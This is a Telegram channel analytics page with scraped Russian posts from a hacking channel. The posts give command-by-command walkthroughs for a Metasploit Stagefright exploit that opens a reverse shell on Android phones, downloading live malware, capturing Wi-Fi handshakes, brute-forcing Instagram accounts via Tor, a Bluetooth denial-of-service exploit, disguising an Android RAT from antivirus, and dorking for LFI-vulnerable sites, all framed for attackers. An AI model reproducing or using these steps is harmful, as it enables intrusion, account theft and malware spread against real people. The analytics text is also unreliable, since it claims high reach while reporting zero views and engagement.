CODE RED
Мир глазами программистов; лучшая литература, обучающие статьи, курсы и некоторые полезные лайфхаки. Обратная связь: @encryptedadm
Show more📈 Analytical overview of Telegram channel CODE RED
Channel CODE RED (@coderedcom) in the Russian language segment is an active participant. Currently, the community unites 10 355 subscribers, ranking 9 416 in the Technologies & Applications category and 61 181 in the Russia region.
📊 Audience metrics and dynamics
Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 10 355 subscribers.
According to the latest data from 03 December, 2024, the channel demonstrates stable activity. Although there has been a change in the number of participants by 0 over the last 30 days and by 0 over the last 24 hours, overall reach remains high.
- Verification status: Not verified
- Engagement rate (ER): The average audience engagement rate is 0%. Within the first 24 hours after publication, content typically collects N/A% reactions from the total number of subscribers.
- Post reach: On average, each post receives 0 views. Within the first day, a publication typically gains 0 views.
- Reactions and interaction: The audience actively supports content: the average number of reactions per post is 0.
📝 Description and content policy
The author describes the resource as a platform for expressing subjective opinions:
“Мир глазами программистов; лучшая литература, обучающие статьи, курсы и некоторые полезные лайфхаки.
Обратная связь: @encryptedadm”
Thanks to the high frequency of updates (latest data received on 04 December, 2024), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.
exploit/android/browser/stagefright_mp4_tx3g_64bit
Теперь нужно будет последовательно прописать необходимые параметры
SRVHOST <ip>
◽️set URIPATH /
◽️set PAYLOAD linux/armle/mettle/reverse_tcp
◽️set LHOST <ip>
◽️set VERBOSE true
Остается только запустить скрипт
-j
В окне появится ссылка, при переходе по которой откроется сессия для удаленного доступа.git clone https://github.com/ytisf/theZoo
Использование
Запускаем интерфейс командой
python theZoo.py
Далее можно выбрать из базы, к примеру, только ботнеты, прописав
search botnet
Чтобы скачать нужный мальварь вписываем
use <порядковый номер вируса в БД>
Далее просто вводим get и получаем архив с вредоносом и ключи для его расшифровки. В целях безопасности theZoo деактивирует вирусы путем шифрования.
Базу данных можно обновлять командой update-db. Более подробная справка доступна по команде help.git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
Переходим в директорию и запускаем скрипт
◽cd airgeddon/
◽sudo bash airgeddon.sh
В случае наличия на ПК всех необходимых компонентов, Airgeddon предложит выбрать сетевую карту. Обычно она начинается на wlan. Вводим её номер и жмем Enter.
Использование
После запуска откроется главное меню. Управление утилитой в принципе сводится к вводу номера команды. Соответственно для базового перехвата хендшейка сначала нужно перевести карту в режим монитора прописав 2. Далее вводим 5, перейдя в раздел работы с хендшейками.
Выбираем пункт "Explore for targets". Когда целей наберется достаточно нажимаем Ctrl-C. Далее нужно будет выбрать точку доступа только ту, у которой возле номера стоит звездочка, поскольку это означает, что к сети подключены другие пользователи.
Остается выбрать "Capture Handshake" и ввести команду 2. Откроется два окна и после перехвата хендшейка, он появится в одном из них. После нужно будет подтвердить перехват в главном окне с Airgeddon.
Далее можно перейти в главное меню и выбрать там под пунктом 6 оффлайн расшифровку хендшейка. Можно также воспользоваться онлайн ресурсами. Во всяком случае хендшейк перехвачен, без единой команды.git clone https://github.com/thelinuxchoice/instashell
Переходим в директорию и ставим права на исполняемый файл
◽cd instashell
◽chmod +x instashell.sh
Использование
Запускаем сервисы TOR командой
◽service tor start
Запускаем Instashell
◽./instashell.sh
Далее нужно ввести никнейм Instagram аккаунта и словарь паролей для перебора. Словари, в свою очередь, часто генерируются на основе собранной информации о пользователе. Как итог при нахождении подходящего пароля, скрипт остановит свою работу.git clone https://github.com/4shadoww/hakkuframework
Переходим в директорию и запускаем скрипт установки
◽cd hakkuframework/
◽./install
Использование
Запускаем фреймворк командой
◽./hakku
Чтобы получить список модулей, нужно выполнить show modules. С помощью help получаем справку по инструменту. Далее просто выбираем модуль, и также через help читаем, как им пользоваться.apt-get update
apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
Далее обновляем pwntools
pip install --upgrade pip
pip install --upgrade pwntools
Устанавливаем библиотеки для работы с Bluetooth
apt-get install bluetooth libbluetooth-dev
pip install pybluez
Скачиваем эксплоит командой
git clone https://github.com/ojasookert/CVE-2017-0781
В скачанном python файле нужно подкорректировать количество пакетов, изменив переменную count до 30000 минимум.
Использование
Сканируем эфир командой
hcitool scan
Выбираем устройство, копируем его MAC адрес и прописываем команду
python CVE-2017-0781.py TARGET=<MAC адрес>
Как итог на атакуемое устройство начнут посылаться запросы, тем самым переполняя буфер, что приведет к ошибкам и отключению службы.git clone https://github.com/sslab-gatech/avpass
Запускаем установщик командой
./install-dep.sh
Использование
Далее нам понадобится сгенерированный билд вируса для Android. Это может быть, к примеру, RAT от AhMyth. Для базовой маскировки остается просто прописать
python gen_disguise.py -i <название файла> individual
Сгенерированный apk файл не детектится большинством антивирусов(разве что одним), а его требования к системе скрыты от пользователя при установке.
#хакингgit clone https://github.com/0x3curity/Samurai
Далее нужно будет установить Lynx командой
◽️apt install lynx
И поставить права на исполняемый файл
◽️chmod +x samurai.sh
Использование
Запускаем программу командой
◽️./samurai.sh
Перед нами появится меню, где можно будет выбрать тип поиска. Вводим соответствующую цифру, к примеру 3. Вводим название компании, и получаем список найденных корпоративных почт.
#OSINT #kaligit clone https://github.com/madRubyroid/LFIFucker.git
Далее нужно будет получить CSE-CX. Для этого нужно перейти по ссылке и добавить новую поисковую систему. В поле "Сайты, на которых выполняется поиск" нужно вписать звездочку и желаемую доменную зону, например: .ru. После сохранения, нужно перейти в Панель управления и скопировать значение из поля "Идентификатор поисковой системы".
Также нужен API-ключ для search engine. Здесь просто переходим в GCloud Console, создаем проект и включаем Custom Search API в разделе "Библиотека API". Далее переходим в "Учетные данные" и берем один из трех API ключей.
Остается только вписать эти две строчки в файл lfi.conf в корневом каталоге LFIFucker.
Использование
Для запуска сканирования по дефолтному шаблону и доркам id= и file= к примеру, нужно вписать команду
◽️./LFIFucker.sh --dork-query id=, file=
Результаты о найденных уязвимых сайтах сохранятся в директорию
tmp. Злоумышленнику останется только подобрать метод и осуществить LFI.
#хакингgit clone https://github.com/Testzero-wz/wscan.git
Переходим в папку и запускаем установщик
◽️cd wscan
◽️python3 -m pip install wscan
Использование
Стандартный фаззинг Wscan запускается в одну строчку
◽️wscan -u "http://www.example.com/" -f -m
Если вписать wscan --help и прочитать справку, можно узнать что вышепредставленная команда сканирует url по словарям, проверяет ссылки и строит карту сайта.
Когда процесс завершится в логах можно будет найти админку сайта, robot.txt, различные JS скрипты и т.д. Злоумышленнику остается только тщательно проанализировать их и в случае нахождения уязвимости начать атаку.
#хакинг #kali